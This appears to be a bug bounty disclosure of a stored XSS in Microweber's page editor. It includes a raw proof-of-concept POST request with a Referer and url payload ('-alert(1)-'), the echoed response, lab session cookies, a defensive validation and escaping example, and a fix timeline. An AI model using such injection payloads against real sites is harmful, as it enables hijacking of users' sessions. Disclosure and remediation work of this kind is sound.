Stored XSS on Multiple Edit Page in microweber/microweber

Valid

Reported on

Mar 29th 2023


Description

A stored XSS with an alert on the Editing page.
I cloned the repo from the master branch and built it with Docker. The footer shows: Version: 1.3.4

Proof of Concept

(Screenshot of the POST request was attached to the original report.)

Request raw:

POST /api/save_edit HTTP/1.1
Host: 192.168.125.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-XSRF-TOKEN: eyJpdiI6IlFJN0ZtaE5JbDhLVWpFZHBSRFVWcFE9PSIsInZhbHVlIjoiRDJQMEgrbkVmSURiZC9GWThuY2ZJMnp4YkV4aVlqQitQN0Vwa1RkK1Nxc1FuYXc1Zzd0ZVJuTjFCUm1HeU02MHVMeEcyNjhZYzhnWi9NUkEzNWg2NXlUQXpLTmJzYlpJVlNqOGtYaHJJampyZjdaVHl0eDVRY3E2NFhMSkNNRVoiLCJtYWMiOiJlZDk4NWVlYmRlN2YxNjRjYmY1NGM0ZWVlZGE4OTIwNTc5NjZhZjMxMWQzMzVlNjMzOWMzY2I5MGJhMWYwN2E4IiwidGFnIjoiIn0=
X-Requested-With: XMLHttpRequest
Content-Length: 2818
Origin: http://192.168.125.131
Connection: close
Referer: http://192.168.125.131/apin0abo'-alert(1)-'rzdwg/file-manager/list?order=asc&orderBy=filemtime&path=%2F&limit=50&page=1
Cookie: memos_session=MTY3OTkxODY4MXxEdi1CQkFFQ180SUFBUkFCRUFBQUh2LUNBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBSUFBZz09fPBd6-5P1k3WJKsaxErdPjFPp6_OkTFmibrRXU0E3jlz; laravel_session=1MLKTpLjLEnXntYlC7Kw07pxYCLz07o4gAQOjbAJ; XSRF-TOKEN=eyJpdiI6IlFJN0ZtaE5JbDhLVWpFZHBSRFVWcFE9PSIsInZhbHVlIjoiRDJQMEgrbkVmSURiZC9GWThuY2ZJMnp4YkV4aVlqQitQN0Vwa1RkK1Nxc1FuYXc1Zzd0ZVJuTjFCUm1HeU02MHVMeEcyNjhZYzhnWi9NUkEzNWg2NXlUQXpLTmJzYlpJVlNqOGtYaHJJampyZjdaVHl0eDVRY3E2NFhMSkNNRVoiLCJtYWMiOiJlZDk4NWVlYmRlN2YxNjRjYmY1NGM0ZWVlZGE4OTIwNTc5NjZhZjMxMWQzMzVlNjMzOWMzY2I5MGJhMWYwN2E4IiwidGFnIjoiIn0%3D; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CMahzlzZOpS3Y7m6i4lxf5eXVsT2AnzPdq7QstBMlgP6wi0j7xF1htq8P64nT%7C%242y%2410%247pQV%2FPF1ZAtlOQwyplLOYeiS9NPByLu64prJf.h%2FWC8W9zW8Rx7s.; back_to_admin=http%3A//192.168.125.131/admin/view%3Asettings%23option_group%3Dwebsite; mw-back-to-live-edit=true; show-sidebar-layouts=0

data_base64=eyJmaWVsZF9kYXRhXzAiOnsiYXR0cmlidXRlcyI6eyJjbGFzcyI6ImVkaXQgbWFpbi1jb250ZW50IiwicmVsIjoiY29udGVudCIsImZpZWxkIjoiY29udGVudCJ9LCJodG1sIjoiXG4gICAgPGRpdiBjbGFzcz1cIm1vZHVsZSBtb2R1bGUtbGF5b3V0c1wiIGlkPVwibW9kdWxlLWxheW91dHMtMjZcIiBkYXRhLW13LXRpdGxlPVwiTGF5b3V0c1wiIHRlbXBsYXRlPVwic2tpbi0xXCIgZGF0YS10eXBlPVwibGF5b3V0c1wiIHBhcmVudC1tb2R1bGU9XCJsYXlvdXRzXCIgcGFyZW50LW1vZHVsZS1pZD1cIm1vZHVsZS1sYXlvdXRzLTI2XCI%2BXG5cbjxzZWN0aW9uIGNsYXNzPVwic2VjdGlvbiBwLXQtMTAwIHAtYi0xMDAgbm9kcm9wIGNsZWFuLWNvbnRhaW5lciBlZGl0IGNoYW5nZWRcIiBmaWVsZD1cImxheW91dC1za2luLTEtbW9kdWxlLWxheW91dHMtMjZcIiByZWw9XCJtb2R1bGVcIj5cbiAgICA8ZGl2IGNsYXNzPVwiY29udGFpbmVyXCI%2BXG4gICAgICAgIDxkaXYgY2xhc3M9XCJyb3dcIj5cbiAgICAgICAgICAgIDxkaXYgY2xhc3M9XCJjb2wtMTIgY29sLW1kLTEyIGFsbG93LWRyb3AgZWxlbWVudFwiIGlkPVwiZWxlbWVudF8xNjgwMTA1NTE2NzUyXCI%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%2BPHAgY2xhc3M9XCJlbGVtZW50XCI%2BXG4gICAgICAgICAgICAgICAgICAgICAgICAgICAgXG4gICAgICAgICAgICAgICAgICAgICAgICA8L3A%2BPC9kaXY%2BXG4gICAgICAgICAgICAgICAgICAgIDwvZGl2PlxuICAgICAgICAgICAgICAgIDwvZGl2PlxuICAgICAgICAgICAgPC9kaXY%2BXG4gICAgICAgIDwvZGl2PlxuICAgIDwvZGl2PlxuPC9zZWN0aW9uPlxuPC9kaXY%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%2BXG4gICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9XCJtdy1jb2xcIiBzdHlsZT1cIndpZHRoOiAxMDAlOyBoZWlnaHQ6IGF1dG87XCI%2BXG4gICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPVwibXctZW1wdHktZWxlbWVudCBlbGVtZW50XCIgaWQ9XCJlbGVtZW50XzE2ODAxMDU1MTY3NTRcIiBzdHlsZT1cInZpc2liaWxpdHk6IHZpc2libGU7XCI%2BPHAgY2xhc3M9XCJlbGVtZW50XCI%2BPC9wPjwvZGl2PjxkaXYgY2xhc3M9XCJtdy1jb2wtY29udGFpbmVyIGVsZW1lbnRcIj48cCBjbGFzcz1cImVsZW1lbnRcIj5cbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBcbiAgICAgICAgICAgICAgICAgICAgICAgIDwvcD48L2Rpdj5cbiAgICAgICAgICAgICAgICAgICAgPC9kaXY%2BXG4gICAgICAgICAgICAgICAgPC9kaXY%2BXG4gICAgICAgICAgICA8L2Rpdj5cbiAgICAgICAgPC9kaXY%2BXG4gICAgPC9kaXY%2BXG4ifSwiaXNfZHJhZnQiOnRydWV9

Response:

{"new_page_url":"http:\/\/192.168.125.131\/apin0abo'-alert(1)-'rzdwg\/file-manager\/list","0":{"rel_type":"module","rel_id":0,"value":"\n    <div class=\"container\">\n        <div class=\"row\">\n            <div class=\"col-12 col-md-12 allow-drop element\" id=\"element_1680105516752\">\n                <div class=\"mw-row\" style=\"height: auto;\" id=\"element_row_1680105516756\">\n                    <div class=\"mw-col\" style=\"width: 100%; height: auto;\">\n                        <div class=\"mw-empty-element element\" id=\"element_1680105516754\" style=\"visibility: visible;\"><p class=\"element\"><\/p><\/div><div class=\"mw-col-container element\"><p class=\"element\">\n                            \n                        <\/p><\/div>\n                    <\/div>\n                <\/div>\n            <\/div>\n        <\/div>\n    <\/div>\n","field":"layout-skin-1-module-layouts-26","is_draft":1,"url":"apin0abo'-alert(1)-'rzdwg\/file-manager\/list"}}

Note:

Edit header:
Referer: http://192.168.125.131/apin0abo'-alert('tuanth1997')-'rzdwg/file-manager/list?order=asc&orderBy=filemtime&path=%2F&limit=50&page=1

Alert: a screenshot of the alert and two PoC videos were attached to the original report.

Impact

If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. The attacker can carry out any of the actions of the user.

Occurrences

Payload: change the url parameter in the request to

url=apin0abo%27-alert%285%29-%27rzdwg
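The PoC request above and this url payload show the same defect from two entry points: a page URL slug is taken from attacker-controlled input (the Referer header, or the url parameter of /api/save_edit), is stored with the page, and is later echoed back (the response above returns it in new_page_url and url). The shape of the payload ('-alert(1)-') indicates that the stored value ends up inside a single-quoted JavaScript string, although the exact template is not shown on the page; that rendering context is an assumption here. The following is an added example, not microweber's own code (microweber is a PHP/Laravel project; JavaScript is used so the example runs stand-alone), showing the two defences a fix would combine: validate the slug when it is saved, and escape every stored value on output for the exact context it lands in. All function names, the allow-list regex and the redirect template are assumptions for illustration.

```javascript
// Added example, not microweber's code. Models the stored XSS in this report
// and two independent defences: input validation of the URL slug and
// context-aware output encoding. Names and templates are illustrative.

// The payload from the report, used here as constructed sample input.
const REPORT_PAYLOAD = "apin0abo'-alert(1)-'rzdwg";

// Layer 1: input validation. A slug is one or more segments of letters and
// digits joined by single hyphens or slashes; anything else is rejected.
// (Assumed slug grammar; the project's real rules may differ.)
const SLUG_RE = /^[A-Za-z0-9]+(?:[-\/][A-Za-z0-9]+)*$/;

function validateSlug(candidate) {
  if (typeof candidate !== "string" || candidate.length > 255) return null;
  return SLUG_RE.test(candidate) ? candidate : null;
}

// Layer 2: output encoding for a JavaScript string literal. Every character
// outside a conservative allow-list becomes a \xHH or \uHHHH escape, so the
// result can never contain a quote, backslash, newline, '<' or '>' that would
// terminate the string literal or the enclosing <script> element.
function jsStringEscape(value) {
  return String(value).replace(/[^A-Za-z0-9_.\/-]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// The vulnerable pattern: raw concatenation of a stored value into a script.
// With the report's payload the slug closes the string literal early.
function renderRedirectScriptUnsafe(slug) {
  return "<script>window.location = '/" + slug + "';</script>";
}

// The hardened pattern: same template, value escaped for its context.
function renderRedirectScript(slug) {
  return "<script>window.location = '/" + jsStringEscape(slug) + "';</script>";
}

// Model of the save handler: reject invalid slugs before they are stored,
// so a bad value never reaches any template at all. `store` is an array
// standing in for the database.
function saveEditUrl(store, rawSlug) {
  const slug = validateSlug(rawSlug);
  if (slug === null) {
    return { ok: false, error: "invalid url slug" };
  }
  store.push(slug);
  return { ok: true, url: slug };
}

// Demonstration when run directly with Node (node example.js).
if (typeof require !== "undefined" && require.main === module) {
  const store = [];
  console.log(saveEditUrl(store, "file-manager/list"));
  console.log(saveEditUrl(store, REPORT_PAYLOAD));
  console.log(renderRedirectScriptUnsafe(REPORT_PAYLOAD));
  console.log(renderRedirectScript(REPORT_PAYLOAD));
}
```

Either layer alone stops this particular payload, but they fail differently: validation protects every later consumer of the stored slug, while output encoding protects against values that reach the template through a path the validator never saw (older rows, imports, other APIs). A fix that only HTML-escapes the value would still be wrong for a JavaScript string context, which is why the encoder above is specific to that context.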

We are processing your report and will contact the microweber team within 24 hours. (6 months ago)
TuanTH modified the report (6 months ago)
TuanTH modified the report (6 months ago)
TuanTH modified the report (6 months ago)
TuanTH modified the report (6 months ago)
We have contacted a member of the microweber team and are waiting to hear back. (6 months ago)

TuanTH (Researcher), 4 months ago:
hi @microweber do you have any update for this post?

Peter Ivanov modified the Severity from Medium (4) to Low (3.8). (3 months ago)
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability. (3 months ago)
TuanTH has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
The researcher's credibility has increased: +7
Peter Ivanov marked this as fixed in 2.0 with commit 42efa9. (3 months ago)
Peter Ivanov has been awarded the fix bounty.
This vulnerability has been assigned a CVE.
Peter Ivanov published this vulnerability. (3 months ago)